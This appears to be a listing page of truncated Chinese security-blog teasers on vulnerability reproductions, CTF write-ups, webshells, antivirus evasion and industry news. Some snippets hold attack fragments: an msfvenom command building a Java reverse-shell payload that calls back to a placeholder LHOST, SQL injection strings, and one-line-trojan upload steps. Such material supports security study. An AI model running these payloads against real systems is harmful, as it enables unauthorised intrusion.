XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]

文章目录 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从…

Parasoft C/C++test：汽车网络安全ISO 21434最佳实践

为什么汽车网络安全很重要Why Automotive Cybersecurity Is Important 许多汽车公司向电子道路车辆的转变从根本上改变了整个行业，提高了汽车的互联性和智能性。随着电子汽车变得更加互联和智能，它们也越来越依赖软件来实现车辆操作，驱动更多…

newstarctf2022week2

Word-For-You(2 Gen) 和week1 的界面一样不过当时我写题的时候出了个小插曲连接 MySQL 失败: Access denied for user rootlocalhost 这句话印在了背景，后来再进就没了，我猜测是报错注入想办法传参可以看到一个name2,试着传参发现有回显三个字段…

现在学Web前端还是网络安全比较好?

前言网络安全和web前端现在都是当今IT技术行业里的热门岗位，任意一个选择一个认真学习掌握了其中主要的内容和知识都能找到一份不错的工作，但很多准备入行的人却不知道应该怎选择哪一个，今天就来简要的给大家介绍分析一下。为什么选择学习…

雷池WAF社区版的使用教程

最近听说了一款免费又好用的WAF软件，雷池社区版，体验了一下虽然还有很多改进的空间但是总体来说很适合小站长使用，和学习使用也建议所有想学防火墙和红队（攻击队）练习使用，听说给官网提交绕过还有额外的…

前端找工作好难啊，准备转行了

前言 23年本科应届生，培训机构出来找了2个月，全国海投，3k白干都没人要。所以经过朋友的推荐，我开始学习网络安全，一共学了大概 5 个多月的时间，今年的 3 月 6 号在长沙找到了一份安全研发的工作&#xff…

wordpress版本识别

wordpress版本识别 1.通过RSS Feed识别 RSS Feed参考访问网站/feed或者?feedrss 例如默认结构：https://www.example.com/?feedrss2 其他结构：https://www.example.com/feed/ 返回结果中搜索 generator 可以看到直接是5.9.7版本 2.wpscan等工具扫一…

hackergame2023菜菜WP

文章目录总结Hackergame2023更深更暗组委会模拟器猫咪小测标题HTTP集邮册Docker for everyone惜字如金 2.0Git? Git!高频率星球低带宽星球小型大语言模型星球旅行日记3.0JSON ⊂ YAML? 总结最近看到科大在举办CTF比赛，刚好我学校也有可以参加，就玩了…

NSS [HNCTF 2022 WEEK2]ohmywordpress（CVE-2022-0760）

NSS [HNCTF 2022 WEEK2]ohmywordpress（CVE-2022-0760） 题目描述：flag在数据库里面。开题： 顺着按钮一直点下去会发现出现一个按钮叫安装WordPress 安装完之后的界面，有一个搜索框。 F12看看network。又出现了这个…

DC系列靶机5通关教程

信息收集主机扫描 sudo arp-scan -l端口扫描 nmap -p- -A 192.168.16.172漏洞发现浏览器访问靶机IP 在Contact找到类似提交数据的地方点击submit，数字发生变化。不断刷新的话，数字依然会发生变化使用bp抓包发送重发器查看数据包再次点击发送查看…

双喜临门 | 开源网安SFuzz在谷歌FuzzBench中夺魁，并获得CWE国际认证

近日，开源网安模糊测试平台SFuzz于上半年推出的“灰盒代码模糊测试系统”，经过数月的不断调优，在谷歌的FuzzBench基准测试中脱颖而出，荣登榜首。此外，SFuzz还成功获得了CWE国际兼容性认证，进一步巩固了其…

如何防止公司代码泄露（如何防止员工拷贝代码）

随着互联网的发展，越来越多的企业开始注重知识产权的保护，其中源代码是企业的重要资产之一。然而，一些员工可能会通过各种手段获取企业的源代码，这对企业的竞争力和商业机密构成了威胁。那么，企业应该如何防止员工拷贝…

网安周报|CISA发布增强开源安全性的计划

1、CISA发布增强开源安全性的计划美国一家领先的安全机构发布了一项期待已久的计划，详细说明了它将如何增强联邦政府和整个生态系统的开源安全性。美国网络安全和基础设施安全局（CISA）开源软件安全路线图在安全开源峰会上发布。据估计&#…

初学phar反序列化

以下内容参考大佬博客：PHP Phar反序列化浅学习 - 跳跳糖首先了解phar是什么东东 Phar是PHP的压缩文档，是PHP中类似于JAR的一种打包文件。它可以把多个文件存放至同一个文件中，无需解压，PHP就可以进行访问并执行内部语句。默认开…

Automated_bounty_Hunter单域名全扫描“神器”—部署

目录 1.前言 2.部署过程 2.1 安装anew 2.2 安装naabu 2.3 安装httpx 2.4 安装nuclei 2.5 安装Xray

【js逆向实战】某讯漫画网站图片逆向

写在前面本来想更安全开发系列，想着复现一下长亭的rad。里面涉及到好多js逆向的知识，正好学习了一波，本身js逆向也是一个大坑，说不定也能完善好多以前的爬虫项目。学了也有一段时间了，来练练手吧涉及到具体的隐私…

定制SQLmap和WAF绕过

网络安全法 1. SQLmap tamper 脚本编写以sqli-lab第26关为例输入?id1’ --，报错字符型注入考虑闭合问题，输入?id1’ and 1，但是回显中and和空格消失了，可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段&…

开发需知的文件加密与解密

背景最近团队遇到一个小需求，存在两个系统 A、B，系统 A 支持用户在线制作皮肤包，制作后的皮肤包用户可以下载后，导入到另外的系统 B 上。皮肤包本身的其实就是一个 zip 压缩包，系统 B 接收到压缩包后，解压…

CCRC-PIPA个人信息保护评估师

个人信息保护评估师 (Personal InformationProtec-tion Assessor，简称 “PIPA”) 是由中国网络安全审查技术与认证中心(简称CCRC) 推出的面向个人信息保护领域的培训认证。CCRC-PIPA课程以《个人信息保护法》、法规、部门规章、相关国家标准和行业最佳实践为基础&am…

免杀对抗-java语言-shellcode免杀-源码修改+打包exe

JAVA-ShellCode免杀-源码修改&打包EXE Shellcode-生成/上线 1.msf生成shellcode 命令：msfvenom -p java/meterpreter/reverse_tcp LHOSTx.x.x.x LPORTxxxx -f jar -o msf.jar 2.msf设置监听 3.执行msf生成的shellcode jar包，成功上线命令&#xff1…

权限提升数据库（基于MySQL的UDF,MOF,启动项提权）

获取数据库权限如何获取数据库的最高权限用户的密码，常用方法有这些网站存在高权限SQL注入点数据库的存储文件或备份文件网站应用源码中的数据库配置文件采用工具或脚本爆破网站存在高权限SQL注入点可以通过sqlmap拿到user表的账号密码，密码可能…

有哪些好用的上网行为管理软件?（上网行为管理软件功能好的软件推荐）

随着互联网的快速发展，企业的信息化管理和员工的上网行为已经成为企业信息化建设的重要组成部分。上网行为管理软件作为一种新型的管理工具，可以帮助企业实现对员工上网行为的管控和优化，进而提高企业的工作效率和网络安全。本文将对多款市场…

如何防止商业秘密泄露（洞察眼MIT系统商业机密防泄密解决方案）

在当今的商业环境中，保护公司的商业秘密是至关重要的。商业秘密可能包括独特的业务流程、客户列表、研发成果、市场策略等，这些都是公司的核心竞争力。一旦这些信息被泄露，可能会对公司的生存和发展产生重大影响。本文将探讨如何通过使用洞察…

metinfo_5.0.4 EXP Python脚本编写

文章目录 metinfo_5.0.4EXP编写SQL注入漏洞 metinfo_5.0.4EXP编写 SQL注入漏洞漏洞点：/about/show.php?langcn&id22 http://10.9.75.142/metInfo_5.0.4/about/show.php?langcn&id22验证漏洞(数字型注入) 状态码区分正确与错误做比较的时候不能采用…

web：[强网杯 2019]随便注

背景知识堆叠注入 sql注入题目点开页面发现有一个输入框，输入1点击查询后发现查看源代码后发现联系源代码中的提示和题目名，想到这道题与sql注入有关尝试一下是否存在sql注入构造payload 1 or 11 #测试字段数构造payload 1 order by 3 #…

upload-labs文件上传1-5关

第一关编写一句话木马1.php，编写完成后将后缀名修改为png 将1.png上传，上传时使用bp抓包抓包后将后缀名修改为png 连接蚁剑第二关上传1.php，显示文件类型不正确使用bp抓包发送重发器，修改文件后缀名后点击发送，…

H3C ER G2系列路由器敏感信息泄露漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、产品介绍 H3C ER2200G2是H3C推出的新一代高性能企业级路由器&#…

[36c3 2019]includer

[36c3 2019]includer 题目描述：Just sitting here and waiting for PHP 8.0 (lolphp). 首先来了解一下临时文件包含之PHP - compress.zlib:// 在 php-src 里可以找到和 compress.zlib:// 有关的代码 | code 注意到 STREAM_WILL_CAST，涉及到 cast 经常…

web：[极客大挑战 2019]Knife

题目点开页面显示为，还有一句话木马查看源代码，没有什么特别的回归题目，页面显示使用菜刀和一句话木马，使用蚁剑连接在根目录找到了flag文件

某金融机构在数据安全及等保合规背景下的网络安全规划项目案例

前言 **近年来网络入侵、信息泄露以及网络病毒等事件频发，国家层面陆续出台多部数据安全相关法律法规，金融行业作为国家强监管的重点行业，参照上层法律法规起草发布了各类相关行业标准和规范。另外，结合笔者所在公司基础架构和信…

Vulnhub-driftingbules:5 靶机复现完整过程

记录对driftingbules:5 靶机的复现过程 kali的IP地址：192.168.200.14 靶机IP地址：192.168.200.60 一、信息收集 1.对利用nmap目标靶机进行扫描由于arp-scan属于轻量级扫描，在此直接使用nmap进行对目标靶机扫描开放端口 nmap -A -p 1-65…

【渗透攻防】千变万化的WebShell

前言 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。本篇文章将带大家学习如何获取WebShell，如何隐藏WebShell，有攻必有防，最后带大家学习查杀WebShell。目录第一节…

python脚本-网页爬虫获取网页图片

python脚本-网页爬虫获取网页图片代码 import requests import re import time url"http://10.9.47.154/python-spider/" # 爬取网站的url headers {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like …

火狐浏览器导入burpsuite CA 证书无法正常上网

当我们给火狐浏览器设置burpsuite代理，并给火狐导入了burpsuite的CA证书后，仍然无法上网的解决方法。当我们把浏览器的代理配置好之后，浏览器导入证书，burpsuite设置好代理后，如上图，仍然无法上网&…

ARL灯塔系统安装

ARL灯塔资产收集工具安装项目地址 https://github.com/TophantTechnology/ARL/ Ubuntu 下可以直接执行 apt-get install docker.io docker-compose -y 安装相关依赖。 ARL安装和启动 cd /opt/ mkdir docker_arl wget -O docker_arl/docker.zip https://github.com/Tophan…

AD CS证书攻击与防御:ESC1

简介 2021年的BlackHat大会上，Will Schroeder和Lee Christensen发布了关于Active Directory Certificate Services 利用白皮书《Certified Pre-Owned - Abusing Active Directory Certificate Services》。攻击对象为AD CS，攻击手法主要是利用证书模版…

NEWSTART2022 web week1

01HTTP flag{f1cb35f5-05de-4559-8f99-28e1f11df403} 02Head?Header! 或者xxf头:localhost 03我真的会谢这个题目比之前有意思多了可知是vim缓存，利用vim缓存知识： 使用vim时会创建临时缓存文件，关闭vim时缓存文件则会被删除。vim异常…

隐私安全｜隐私安全已从国家法律法规转向商业企业应用，如何理解以及落地建设，相信大家正在经历隐私安全的困扰

网络空间的隐私安全主要是指网络隐私权不受侵犯，网络隐私权是指自然人在网上享有的，与公共利益无关的个人活动领域与个人信息秘密依法受到保护，不被他人非法侵扰，知悉收集，利用和公开的一种人格权，也包括第…

Javascript知识点详解：正则表达式

目录 RegExp 对象概述实例属性实例方法 RegExp.prototype.test() RegExp.prototype.exec() 字符串的实例方法 String.prototype.match() String.prototype.search() String.prototype.replace() String.prototype.split() 匹配规则字面量字符和元字符转义符…

StripedFly恶意软件：悄无声息运行5年，感染百万设备

导语：最近，俄罗斯网络安全公司Kaspersky发布的一项调查显示，一种名为StripedFly的高级恶意软件伪装成加密货币挖矿程序，悄无声息地在全球范围内运行了超过5年，感染了100万台设备。这是一种复杂的模块化框架&#xff0c…

Java在互联网网络安全中的应用（三）

目录 1. 互联网网络安全概述 2. Java的网络安全特性 3. 用Java加固网络应用 4. 安全传输 5. 安全框架和工具 6. 实际应用案例 7. 最佳实践和资源目标本次技术分享的目标是介绍Java技术在互联网网络安全中的应用，包括关键概念、最佳实践和实际案例。 1. 互…

不同规模的企业如何借助宁盾LDAP统一用户认证实现安全和效率需求？

中小企业要解决安全和业务效率问题，须提前规划软件基础设施，其中最基础的部分是建立统一账号和统一用户身份认证体系。这个体系相当于在软件系统之间建立了一套统一的身份标准，基于这套标准创建的账号让员工方便、高效地访问公司内的大部分软…

xdcms漏洞合集-漏洞复现

目录 xdcms v3.0.1漏洞环境搭建代码审计目录总览配置文件总览登陆处sql注入漏洞分析漏洞复现注册处sql注入漏洞漏洞分析漏洞复现 getshell 任意文件删除 xdcms订餐网站管理系统v1.0漏洞简介环境搭建全局变量的覆盖漏洞分析漏洞复现后台任意…

vpn概述总结

一、VPN背景在Internet的传输中绝大部分数据的内容都是明文传输的存在很多安全隐患如窃听篡改冒充总部分公司办事处出差人员合作单位需要访问总部网络资源的问题二，VPN定义（Vitual Private Network，虚拟私有网）&…

Tomcat8 任意写文件PUT方法 (CVE-2017-12615)

Tomcat 任意写文件PUT方法 (CVE-2017-12615) 文章目录 Tomcat 任意写文件PUT方法 (CVE-2017-12615)1 在线漏洞解读:2 版本影响3 环境搭建4 漏洞复现4.1 访问4.2 POC攻击点4.2.1 直接发送以下数据包，然后shell将被写入Web根目录。4.2.2 访问是否通，可以访…

Vulnhub系列靶机---JANGOW 1.0.1

文章目录网卡配置信息收集主机发现端口扫描漏洞利用反弹Shell提权靶机文档：JANGOW 1.0.1 下载地址：Download (Mirror) 难易程度：. 网卡配置水果味儿信息收集主机发现端口扫描访问80端口点击site目录点击页面上方的一个选项&…

【漏洞复现】Jeecg-Boot SQL注入漏洞(CVE-2023-34659)

漏洞描述 jeecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant Design&Vue，Mybatis-plus，Shiro，JWT，支持微服务。强大的代码生成器让前后端代码一键生成，实现低代码开发！JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生…

信息安全：网络安全漏洞防护技术原理与应用.

信息安全：网络安全漏洞防护技术原理与应用. 网络安全漏洞又称为脆弱性，简称漏洞。漏洞一般是致使网络信息系统安全策略相冲突的缺陷，这种缺陷通常称为安全隐患。安全漏洞的影响主要有机密性受损、完整性破坏、可用性降低、抗抵赖性缺失、可…

【漏洞复现】五、seacms 远程命令执行（CNVD-2020-22721）

五、seacms 远程命令执行 （CNVD-2020-22721） 5.1、漏洞原理在w1aqhp/admin_ip.php下第五行使用set参数，对用户输入没有进行任何处理，直接写入文件。攻击者可利用该漏洞执行恶意代码，获取服务器权限 5.2、影响版本 …

【漏洞复现】六、maccms 远程命令执行（CVE-2017-17733）

【漏洞复现】六、maccms 远程命令执行（CVE-2017-17733） 6.0、储备知识 1、可控参数 （审计） 2、fputs()函数函数写入文件（可安全用于二进制文件），fputs() 函数是 fwrite() 函数的别名 fpu…

免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

Python-MSF/CS生成shellcode-上线 cs上线 1.生成shellcode-c或者python 2.打开pycharm工具，创建一个py文件，将原生态执行代码复制进去 shellcode执行代码： import ctypesfrom django.contrib.gis import ptr#cs#shellcodebytearray(b"生…

Vulnhub系列靶机---HarryPotter-Fawkes-哈利波特系列靶机-3

文章目录信息收集主机发现端口扫描dirsearch扫描gobuster扫描漏洞利用缓冲区溢出edb-debugger工具msf-pattern工具 docker容器内提权tcpdump流量分析容器外- sudo漏洞提权靶机文档：HarryPotter: Fawkes 下载地址：Download (Mirror) 难易程度&#xff…

怎样提高服务器安全性？45.248.11.x

服务器被攻击一般有两种比较常见的方式：一是恶意的攻击行为，如拒绝服务攻击，网络病毒等等，这种方式就是消耗服务器资源，影响服务器的正常运作，甚至服务器所在网络的瘫痪;另外一个就是恶意的入侵行为&#x…

信息安全：网络安全审计技术原理与应用.

信息安全：网络安全审计技术原理与应用. 网络安全审计是指对网络信息系统的安全相关活动信息进行获取、记录、存储、分析和利用的工作。网络安全审计的作用在千建立“事后“安全保障措施，保存网络安全事件及行为信息，为网络安全事件分析提供线…

数据加密软件有哪些(五款好用的数据加密软件推荐)

随着信息技术的飞速发展，数据安全问题日益凸显。为了保护企业和个人的隐私，数据加密技术应运而生。本文将为您介绍一些真实有效的数据加密工具。 1、洞察眼MIT系统洞察眼MIT系统是一种专为企业用户开发的数据防泄密系统。该工具采用了先进的透明加密算…

计算机等级考试—信息安全三级真题十

目录一、单选题二、填空题三、综合题一、单选题

HCIP---VLAN

文章目录前言一、pandas是什么？二、使用步骤 1.引入库2.读入数据总结前言一.VLAN概述 VLAN（Virtual Local Area Network，虚拟局域网）是一种基于交换机和网络设备的划分技术，可以将不同区域的计算机、服务器和网络设…

通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]

文章目录通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现…

Globalsign证书

GlobalSign是全球可信的数字证书提供商之一，提供广泛的证书服务，包括SSL证书、代码签名证书、电子邮件证书等，帮助保护企业和个人的网络安全。本文将详细介绍GlobalSign证书的特点和优势，帮助您更好地了解这一重要的数字证书提供商…

急招开发、安全工程师实习生

信息安全工程师-实习生公司：四川久远银海软件股份有限公司工作职责 1、负责对公司WEB应用、APP、小程序、公众号等产品进行安全渗透测试； 2、负责对参与攻防演练、护网行动的项目组提供安全技术支撑； 3、负责提供基线核查、风险评估、主…

小白高效自学-网络安全（黑客技术）

网络安全零基础入门学习路线&规划初级 1、网络安全理论知识（2天） 了解行业相关背景，前景，确定发展方向。学习网络安全相关法律法规。网络安全运营的概念。等保简介、等保规定、流程和规范。（非常重要&#x…

Evil靶场

Evil 1.主机发现使用命令探测存活主机，80.139是kali的地址，所以靶机地址就是80.134 fping -gaq 192.168.80.0/242.端口扫描开放80，22端口 nmap -Pn -sV -p- -A 192.168.80.1343.信息收集访问web界面路径扫描 gobuster dir -u http…

智能网联汽车有哪些信息安全场景

目录 1.车内安全通信 2.车云安全通信 3.安全启动 4.车载应用程序保护 5.入侵检测防御与日志管理系统在聊完车载信息安全需求之后，势必要去看看应用场景有哪些。根据之前的开发经验简单聊一下我知道的，还有很多没有讲，比如说车云之间具…

海淀区委网信办领导到中睿天下调研

近日，北京市海淀区委宣传部副部长，海淀区委网信办主任黄英、海淀区委网信办副主任陈魁一行到中睿天下北京总部调研，中睿天下副总经理李小琼、联合创始人魏海宇、国防营销中心总经理吕宗辉参加。海淀区委网信办一行参观了中睿天下展厅&#x…

RapidSSL证书

RapidSSL是一家经验丰富的证书颁发机构，主要专注于提供标准和通配符SSL证书的域验证SSL证书。在2017年被DigicertCA收购后，RapidSSL改进了技术并开始使用现代基础设施。专注于为小型企业和网站提供基本安全解决方案的SSL加密。RapidSSL它具有强大的浏览器…

泛微E-Mobile 6.0命令执行漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、漏洞原理泛微E-Mobile 6.0存在命令执行漏洞的问题，在…

泄露35TB数据，医疗巨头Henry Schein遭受黑猫勒索组织攻击

近日，据Bleeping Computer 网站消息，BlackCat（黑猫）勒索软件团伙将医疗保健巨头Henry Schein 添加到了其暗网泄露网站，并声称其破坏了该公司的网络，窃取了35 TB的敏感文件，这些文件包括了Henry …

【js逆向实战】某sakura动漫视频逆向

写在前面再写一个逆向实战，后面写点爬虫程序来实现一下。网站简介与逆向目标经典的一个视频网站，大多数视频网站走的是M3U8协议，就是一个分段传输，其实这里就有两个分支。通过传统的m3u8协议，我们可以直接进行分…

NSS [HUBUCTF 2022 新生赛]checkin

NSS [HUBUCTF 2022 新生赛]checkin 判断条件是if ($data_unserialize[username]$username&&$data_unserialize[password]$password)，满足则给我们flag。正常思路来说，我们要使序列化传入的username和password等于代码中的两个同名变量&#xff0…

网络安全（黑客）自学笔记1.0

前言今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习，最终也只是会无疾而终！黑客是一个大的概念，里面包含了许多方向，不同的方向需要学习的内容也不一样。算上从学校开始学…

如何提高网站安全防护？

网站的安全问题一直是很多运维人员的心头大患，一个网站的安全性如果出现问题，那么后续的一系列潜在危害都会起到连锁反应。就好像网站被挂马，容易遭受恶意请求呀，数据泄露等等都会成为杀死网站的凶手。高防CDN不仅可以有效抵御各…

什么是 CASB,在网络安全中的作用

数字化转型正在稳步攀升，组织现在越来越关注在线生产力系统和协作平台，各行各业的企业都采用了不同的云基础设施服务模式。云基础架构提供按需服务，可提高易用性、访问控制、内容协作和减少内部存储资源，以及许多其他好处。迁移到…

网络安全专业的就业方向有哪些？

网络安全专业的就业方向有哪些？ 网络安全专业毕业生就业较多，可以从事计算机科学与技术、信息与通信、电子商务、互联网金融、电子政务等领域的相关工作。还可以从事政府机关事业单位、银行、保险等信息安全产品的研发、信息系统安全分析与设计、信息安…

数据库安全：MySQL 身份认证漏洞（CVE-2012-2122）

数据库安全：MySQL 身份认证漏洞（CVE-2012-2122） MySQL 身份认证漏洞是一个身份认证绕过漏洞，该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷，这个漏洞可以使攻击者可以绕过安全身份认证，从…

实现跨域必须要知道的知识点

目录同源策略 cookie iframe和多窗口通信片段识别符 window.postMessage() LocalStorage Storage接口： 概述属性和方法 Storage.setItem() Storage.getItem() Storage.removeItem() Storage.clear() Storage.key() storage 事件同源策略浏览器…

数据库安全：InfluxDB 未授权访问-Jwt验证不当漏洞.

数据库安全：InfluxDB 未授权访问-Jwt验证不当漏洞. InfluxDB 是一个开源分布式时序，时间和指标数据库。其数据库是使用 Jwt 作为鉴权方式，在用户开启认证时，如果在设置参数 shared-secret 的情况下，Jwt 认证密钥为空…

【华为HCIP | 华为数通工程师】IPV4与IPV6 高频题（1）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

Web 安全之时序攻击 Timing Attack 详解

目录什么是 Timing Attack 攻击？ Timing Attack 攻击原理 Timing Attack 攻击的几种基本类型如何防范 Timing Attack 攻击小结什么是 Timing Attack 攻击？ Timing Attack（时序攻击）是一种侧信道攻击（timing s…

小H靶场学习笔记：DC-2

DC-2 Created: November 10, 2023 3:01 PM Tags: WordPress, git提权, rbash逃逸 Owner: 只会摸鱼靶场过程信息收集扫描存活主机，找到靶机ip：192.168.199.131（本机是192.168.199.129） 扫描端口开放协议发现有80端口和77…

【网络奇遇记】我和因特网的初相遇2 —— 三种交换方式

🌈个人主页：聆风吟 🔥系列专栏：网络奇遇记、数据结构 🔖少年有梦不应止于心动，更要付诸行动。文章目录前言一. 电路交换1.1 电路交换讲解1.2 电路交换实例二. 分组交换1.1 分组交换讲解1.2 分组交换实例…

VulnHub Prime_Series_Level-1

一、信息收集 1.nmap扫描 ┌──(root💀kali)-[~/桌面] └─# arp-scan -l┌──(root💀kali)-[~/桌面] └─# nmap -sS -A -p- 192.168.103.202发现开放了22和80端口 2.web页面打开80端口的web页面，是一张静态的图片，没什么价…

Python武器库开发-Linux系统ssh暴力破解密码自动断阻器（二十）

Linux系统ssh暴力破解密码自动断阻器关于Linux系统遭遇ssh暴力破解时，我们需要对相关进行暴力破解的非法IP进行封禁，提供以下的脚本，我们只需要在遭遇ssh暴力破解行为的Linux系统上运行该脚本，该脚本便会自动封禁进行ssh远程登陆…

2023NewStarCTF

目录一、阳光开朗大男孩二、大怨种三、2-分析四、键盘侠五、滴滴滴六、Include? 七、medium_sql 八、POP Gadget 九、OtenkiGirl 一、阳光开朗大男孩 1.题目给出了secret.txt和flag.txt两个文件，secret.txt内容如下： 法治自由公正爱国…

NLP在网安领域中的应用（初级）

NLP在网安领域的应用写在最前面1. 威胁情报分析1.1 社交媒体情报分析（后面有详细叙述）1.2 暗网监测与威胁漏洞挖掘 2. 恶意软件检测2.1 威胁预测与趋势分析 3. 漏洞管理和响应4. 社交工程攻击识别4.1 情感分析与实时监测4.2 实体识别与攻击者画像构建4.…

高防IP可以抵御哪些恶意攻击

高防IP协议可以隐藏用户的站点，使得攻击者无法发现恶意攻击的目标网络资源，从而提高了源站的安全性。能够有效抵御常见的恶意攻击类型ICMPFlood、UDPFlood、 TCPFlood、SYNFlood、ACKFlood等，帮助游戏、金融、电子商务、互联网、政企等行业抵…

员工电脑监控的方法有哪些

有人在后台问，员工电脑监控的方法有哪些？ 其实主要包括以下几方面：1）安装监控软件 2）使用操作系统自带的工具 3）部署网络监控设备 4）定期检查电脑 5）制定严格的规章制度因为内容比…

黑客技术-小白学习手册

一、黑客是什么原是指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。但后来，黑客一词已被用于泛指那些专门利用电脑网络搞破坏或者恶作剧的家伙。二、学习黑客技术的原因其实，网络信息空间安全已经成为海陆空之…

漏洞复现--用友U8-cloud RegisterServlet SQL注入

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

Kerberos认证系统

文章目录前提知识原理第一次对话第二次对话第三次对话总结发现前提知识 KDC：由AS、TGS，还有一个Kerberos Database组成。 Kerberos Database用来存储用户的密码或者其他所有信息，请求的时候需要到数据库中查找。 AS：为客户端提…

网络安全-学习手册

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

[当人工智能遇上安全] 10.威胁情报实体识别 (1)基于BiLSTM-CRF的实体识别万字详解

您或许知道，作者后续分享网络安全的文章会越来越少。但如果您想学习人工智能和安全结合的应用，您就有福利了，作者将重新打造一个《当人工智能遇上安全》系列博客，详细介绍人工智能与安全相关的论文、实践，并分享各种案…

详解[ZJCTF 2019]NiZhuanSiWei 1（PHP两种伪协议、PHP反序列化漏洞、PHP强比较）还有那道题有这么经典？

题目环境： <?php $text $_GET["text"]; $file $_GET["file"]; $password $_GET["password"]; if(isset($text)&&(file_get_contents($text,r)"welcome to the zjctf")){echo "<br><h1>&…

【ATTCK】ATTCK开源项目Caldera学习笔记

CALDERA是一个由python语言编写的红蓝对抗工具（攻击模拟工具）。它是MITRE公司发起的一个研究项目，该工具的攻击流程是建立在ATT&CK攻击行为模型和知识库之上的，能够较真实地APT攻击行为模式。通过CALDERA工具，安全…

sqli-labs(Less-3)

1. 通过构造id1’ 和id1’) 和id1’)–确定存在注入可知原始url为 id(‘1’) 2.使用order by 语句猜字段数 http://127.0.0.1/sqlilabs/Less-3/?id1) order by 4 -- http://127.0.0.1/sqlilabs/Less-3/?id1) order by 3 --3. 使用联合查询union select http://127.0.0.1…

【华为HCIP | 华为数通工程师】IPV4与IPV6 高频题（2）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

文件包含学习笔记总结

文件包含概述程序开发人员通常会把可重复使用函数或语句写到单个文件中，形成“封装”。在使用某个功能的时候，直接调用此文件，无需再次编写，提高代码重用性，减少代码量。这种调用文件的过程通常称为包含。程…

CNVD-2021-09650：锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]

文章目录锐捷NBR路由器guestIsUp.php远程命令执行漏洞(CNVD-2021-09650)复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现锐捷NBR路由器guestIsUp.php远程命令执行漏洞(CNVD-2021-09650)复现 [附POC] 0x01 前言免…

FBI：皇家勒索软件要求350名受害者支付2.75亿美元

导语最近，FBI和CISA联合发布的一份通告中透露，自2022年9月以来，皇家勒索软件（Royal ransomware）已经入侵了全球至少350家组织的网络。这次更新的通告还指出，这个勒索软件团伙的赎金要求已经超过了2.75亿美…

【漏洞复现】maccms苹果cms 命令执行漏洞

漏洞描述感谢提供更多信息。“苹果CMS” 似乎是指 “Maccms”，这是一款开源的内容管理系统，主要用于搭建视频网站。Maccms 提供了一套完整的解决方案，包括用户管理、视频上传、分类管理、数据统计等功能，使用户能够方便地创建和…

BUUCTF [BJDCTF2020]认真你就输了 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 来源：https://github.com/BjdsecCA/BJDCTF2020 密文： 下载附件，解压得到一个.xls文件。解题思路： 1、双击文件，提示“10.xls”的文件格式和扩展名不匹配…

浙大恩特客户资源管理系统CustomerAction.entphone；.js 接口任意文件上传漏洞复现 [附POC]

文章目录浙大恩特客户资源管理系统CustomerAction.entphone;.js 接口任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议浙大恩特客户资源管理系统CustomerAction.entphone;.js 接口任…

渗透必备：Proxifier玩转代理

目录 0# 概述 1# Proxifier介绍 2# 操作过程 2.1 配置代理服务器 2.2 配置代理规则 3# Proxifier玩转代理 3.0 配置说明 3.1 通过Proxifier进行内网渗透 3.2 通过Proxifier将VM虚拟机代理 3.3 通过Proxifier进行小程序抓包 3.4 补充 4# 总结 0# 概述在日常的渗透过…

Os-ByteSec

Os-ByteSec 一、主机发现和端口扫描主机发现，靶机地址192.168.80.144 端口扫描，开放了80、139、445、2525端口二、信息收集访问80端口路径扫描 dirsearch -u "http://192.168.80.144/" -e *访问扫描出来的路径，没有发现…

万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞附POC

@[toc] 万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞附POC 免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文…

黑客技术-小白自学手册（网络安全）

